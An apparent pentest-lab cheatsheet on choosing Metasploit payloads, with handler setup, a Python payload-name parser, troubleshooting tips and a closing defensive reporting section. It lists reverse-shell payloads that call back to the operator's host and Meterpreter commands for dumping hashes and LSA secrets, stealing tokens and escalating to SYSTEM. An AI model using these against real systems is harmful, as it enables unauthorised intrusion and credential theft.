🛡️ Methodology Checklist
- List payloads for target arch/OS: `msfvenom --list payloads | grep [OS]`
- Staged vs stageless: staged (`/tcp`) requires listener; stageless (`/tcp_shell`) is self-contained
- Choose payload: `windows/x64/meterpreter/reverse_tcp` for modern Windows
- Set LHOST/LPORT to match handler
- Start handler: `use exploit/multi/handler` → set payload, LHOST, LPORT → `run -j`
- Deliver payload and wait for callback
- Verify session established before proceeding
🎯 Operational Context
Use when: Selecting the right MSF payload type before generating or deploying — understand staged vs stageless, singles, and platform differences.

Think Dumber First: Staged = smaller initial shellcode + stage 2 download (needs reliable network). Stageless = self-contained but larger. For unstable networks or restricted egress, always use stageless. Port 443 always preferred over 4444.

Skip when: Non-MSF delivery required — use msfvenom standalone instead of MSF handler.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `grep meterpreter grep reverse_tcp show payloads` | Filter payloads by chained grep |
| `set payload windows/x64/meterpreter/reverse_tcp` | Set staged Meterpreter payload |
| `set payload windows/x64/shell_reverse_tcp` | Set stageless CMD shell payload |
| `set payload 15` | Set payload by index number |
| `show payloads` | List all payloads compatible with current module |
| `set LHOST tun0` | Set local host (always use tun0 on VPN) |
| `set LPORT 4444` | Set local listener port |
| `ifconfig` | Check your IP inside msfconsole |
| `run` | Execute exploit with selected payload |
| `getuid` | Meterpreter: show current user (equiv to whoami) |
| `sysinfo` | Meterpreter: system details (OS, arch) |
| `hashdump` | Meterpreter: dump SAM database NTLM hashes |
| `background` | Background active Meterpreter session |
| `shell` | Drop from Meterpreter into system CMD/Bash |
🔬 Deep Dive & Workflow
Singles vs Staged — The Critical Distinction
| | Singles (Inline) | Staged (Stager + Stage) |
|---|---|---|
| Naming | Underscores: `shell_reverse_tcp` | Slashes: `shell/reverse_tcp` |
| Delivery | Exploit + shellcode in one packet | Tiny stager, then downloads stage |
| Size | Larger | Compact stager |
| Stability | More stable (no second network step) | Needs stable connection for stage download |
| Example | `windows/x64/shell_reverse_tcp` | `windows/x64/shell/reverse_tcp` |
| AV | Entire payload hits disk at once | Stage downloads into memory |

Read the naming: `windows/x64/meterpreter/reverse_tcp` = “download Meterpreter stage via reverse_tcp” (staged). `windows/x64/meterpreter_reverse_tcp` = all-in-one (stageless).
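The naming rule above (slash between type and transport = staged, underscore = single/inline) is mechanical enough to encode. This added example, not Metasploit's own code, parses payload names into their parts, rewrites a staged name to its stageless twin as the troubleshooting table suggests, and checks that a handler's PAYLOAD matches the generated one; the `platform/[arch/]type` layout and the small arch and transport lists are my assumptions, covering the names on this page.

```python
"""Classify Metasploit payload names by the staged/stageless naming rule.
Added example (not Metasploit code): assumes the conventional
platform/[arch/]type[/ or _]transport layout and a short token list."""
from dataclasses import dataclass
from typing import Optional

ARCHES = {"x64", "x86", "aarch64", "armle", "mipsle", "mipsbe"}
# Transport tokens; https before http so the suffix test is unambiguous
TRANSPORTS = ("reverse_tcp", "reverse_https", "reverse_http", "bind_tcp")


@dataclass
class Payload:
    platform: str
    arch: Optional[str]
    kind: str                 # meterpreter, shell, exec, vncinject, ...
    staged: bool
    transport: Optional[str]  # None for singles with no callback (exec)


def parse_payload(name: str) -> Payload:
    parts = name.split("/")
    platform, rest = parts[0], parts[1:]
    arch = rest.pop(0) if rest and rest[0] in ARCHES else None
    if not rest:
        raise ValueError(f"no payload type in {name!r}")
    if len(rest) >= 2:
        # slash between type and transport: stager that fetches a stage
        return Payload(platform, arch, rest[0], True, "/".join(rest[1:]))
    leaf = rest[0]
    for t in TRANSPORTS:
        # underscore between type and transport: single, all-in-one
        if leaf.endswith("_" + t) and len(leaf) > len(t) + 1:
            return Payload(platform, arch, leaf[: -len(t) - 1], False, t)
    return Payload(platform, arch, leaf, False, None)


def to_stageless(name: str) -> str:
    """Rewrite meterpreter/reverse_tcp style names to meterpreter_reverse_tcp."""
    p = parse_payload(name)
    if not p.staged:
        return name
    prefix = "/".join(x for x in (p.platform, p.arch) if x)
    return f"{prefix}/{p.kind}_{p.transport}"


def handler_matches(handler: str, generated: str) -> bool:
    """Handler PAYLOAD and generated payload must be the same kind and staging."""
    return parse_payload(handler) == parse_payload(generated)
```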
Meterpreter — What Makes It Different
- In-memory DLL injection — no binary written to disk
- AES-encrypted channel — hides traffic content from network IDS
- Extensible — loads extensions (Mimikatz, incognito) over the wire at runtime
- Unix-style navigation on Windows (`ls`, `cd`, `pwd`)
- Persistence — harder to detect than CMD shell
Key Meterpreter commands:
getuid → whoami equivalent
sysinfo → OS, hostname, arch
hashdump → dump SAM hashes (needs SYSTEM)
lsa_dump_secrets → dump LSA secrets and cached creds
migrate <PID> → move to another process (stability/stealth)
steal_token <PID> → impersonate another process's token
getsystem → auto-escalate to SYSTEM
upload / download → file transfer
portfwd / route → pivoting
Common Windows Payload Reference
| Payload | Type | Use Case |
|---|---|---|
| `windows/x64/shell_reverse_tcp` | Single | Quiet, no Meterpreter needed |
| `windows/x64/shell/reverse_tcp` | Staged | When buffer space is limited |
| `windows/x64/meterpreter/reverse_tcp` | Staged | Full post-ex capability |
| `windows/x64/exec` | Single | Run one command |
| `windows/x64/vncinject/reverse_tcp` | Staged | GUI remote desktop |
LHOST Trap — Most Common Failure
If LHOST is set to your LAN IP instead of the VPN IP (tun0), the staged payload’s stager will run but the stage download will fail — you get a hanging session with no Meterpreter.
```
# Always verify
ifconfig
set LHOST tun0   # not 192.168.x.x
```

Architecture Mismatch
x64 payload on x86 target → process crash. Always confirm arch from nmap scan (OS CPE) before selecting payload.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Payload fails silently | Stage 2 download blocked by firewall | Switch to stageless: change meterpreter/reverse_tcp to meterpreter_reverse_tcp |
| Wrong architecture payload sent | Auto-select chose x86 on x64 target | Explicitly set PAYLOAD to windows/x64/... after checking systeminfo |
| Handler shows connection but no session | Stage 2 rejected | Confirm handler PAYLOAD matches what was generated; both must be identical |
| Payload exits after short time | Session timeout | Run `set SessionExpirationTimeout 0` in handler before exploit |
| Multi/handler not catching connection | Wrong LHOST | Set LHOST to VPN interface IP (tun0/ppp0) not LAN IP: ip addr show tun0 |
📝 Reporting Trigger
Finding Title: MSF Staged/Stageless Payload Achieves Remote Session

Impact: Correct payload selection based on network conditions ensures reliable session establishment, providing post-exploitation capability including lateral movement and credential access.

Root Cause: Vulnerable service running with insufficient network egress restrictions. No payload delivery detection at network or endpoint layer.

Recommendation: Implement egress filtering to block outbound connections on non-business ports. Deploy EDR with shellcode execution detection. Patch vulnerable service immediately.